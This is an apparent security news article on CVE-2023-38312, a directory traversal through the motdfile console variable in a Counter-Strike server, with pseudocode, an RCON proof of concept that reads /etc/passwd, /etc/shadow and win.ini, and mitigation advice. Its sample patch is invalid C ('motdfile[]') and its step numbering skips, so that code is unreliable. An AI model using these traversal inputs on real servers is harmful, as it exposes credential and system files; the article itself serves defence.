CVE CyberSecurity Database News

CVE-2023-38312 - Directory Traversal in Valve Counter-Strike 8684 — Exploit, Details, and Mitigation

Poster -

In June 2023, a serious security flaw was uncovered in the classic game Valve Counter-Strike (build 8684). Identified as CVE-2023-38312, this vulnerability lets attackers use the motdfile console variable to read any file from the server’s filesystem. If you host Counter-Strike servers, this bug puts your configs, passwords, and even system files at risk. Below, we’ll walk you through how the vulnerability works, see code examples, learn how an attacker might exploit the issue, and end with practical ways to protect your server.

What’s The Motdfile Variable?

Counter-Strike servers use motdfile to set which file displays as the “Message of the Day” in the game’s menu. Normally, admins set this to something innocent like motd.txt to show rules or a welcome message.

Unfortunately, Counter-Strike’s handling of motdfile fails to sanitize user input. This opened the door for what’s called a directory traversal attack.

Directory Traversal Quick Explanation

Directory traversal (a.k.a. “dot-dot-slash” ../ attack) is when input lets a user access files outside the intended directory. For example, if an input lets you enter ../../../../etc/passwd instead of a normal filename, you can access a critical file — in Linux, one that lists usernames.

The Vulnerability: How It Works

On vulnerable servers, any client with remote control access (like RCON or a similar privilege) can set the motdfile variable to a path like ../../../../etc/passwd or use Windows paths.

Vulnerable Code Concept

// Pseudocode snippet showing possible server logic
char motdfile[128];
get_console_var("motdfile", motdfile);
// ...
FILE *fp = fopen(motdfile, "r"); // No sanitization!

If motdfile holds ../../../../windows/win.ini, the server will read and display that file — even though it shouldn’t.

Proof-of-Concept Exploit

You need RCON (remote console) or similar admin/remote access on the server.

`

rcon motdfile ../../../../etc/passwd

`

rcon motdfile ../../../../windows/win.ini

Example Exploit Session

rcon_address 1.2.3.4
rcon_password hunter2
rcon motdfile ../../../../etc/shadow
rcon motd

*Note:* On a well-configured UNIX system, non-root servers may not read sensitive files. But many setups run as root or with overly broad permissions.

References

- MITRE CVE-2023-38312
- Packet Storm Security Advisory: Counter-Strike Directory Traversal
- NVD - CVE-2023-38312

1. Patch Your Server

Check SteamCMD or your server provider for official patches or updates.
Counter-Strike 1.6 and its server binaries may get community or official fixes.

3. Add File Path Filtering (Custom Fix)

If you compile your own mod or run a plugin, add a whitelist for motdfile so only approved filenames are allowed.

Example Patch Logic

// Simple C patch concept
if (strstr(motdfile, "..") != NULL) {
    printf("Directory traversal attempt blocked!\n");
    return;
}
if (motdfile[] == '/' || motdfile[] == '\\') {
    printf("Absolute path blocked!\n");
    return;
}

4. Run Server as Low-Privilege User

Don’t run game servers as root/Administrator. Use a dedicated user with as few permissions as possible!

Conclusion

CVE-2023-38312 is a prime example of why input validation is critical, even in games. Directory traversal can lead to full server compromise, especially when paired with overly broad server permissions. If you’re a Counter-Strike server admin, patch your server, watch your permissions, and never share RCON. For further reading and updates, check the original MITRE entry and follow relevant game security advisories.

Timeline

Published on: 10/15/2023 19:15:09 UTC
Last modified on: 10/19/2023 14:18:26 UTC